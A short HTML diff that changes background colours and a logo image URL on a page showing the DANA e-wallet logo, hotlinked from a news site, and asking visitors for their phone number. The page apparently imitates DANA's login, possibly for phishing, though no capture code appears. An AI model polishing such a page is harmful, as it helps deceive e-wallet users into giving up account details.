--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     }
     body {
       font-family: Arial, sans-serif;
-      background-color: #008CFF;
+      background-color: #2796f1;
       margin: 0;
       padding: 0;
       display: flex;
@@ -20,7 +20,7 @@
     }
 
     .container {
-      background-color: #008CFF;
+      background-color: #2796f1;
       width: 100%;
       max-width: 400px;
       padding: 30px 24px;
@@ -195,7 +195,7 @@
 <body>
   <div class="container" id="input-nomor">
     <div class="logo">
-      <img src="https://cdn.antaranews.com/cache/1200x800/2022/04/25/dana.jpg.webp" alt="DANA Logo">
+      <img src="https://cdn.antaranews.com/cache/1200x800/2022/04/25/dana.jpg" alt="DANA Logo">
     </div>
     <div class="title">Masukkan nomor HP kamu untuk lanjut</div>
     <div class="input-row">
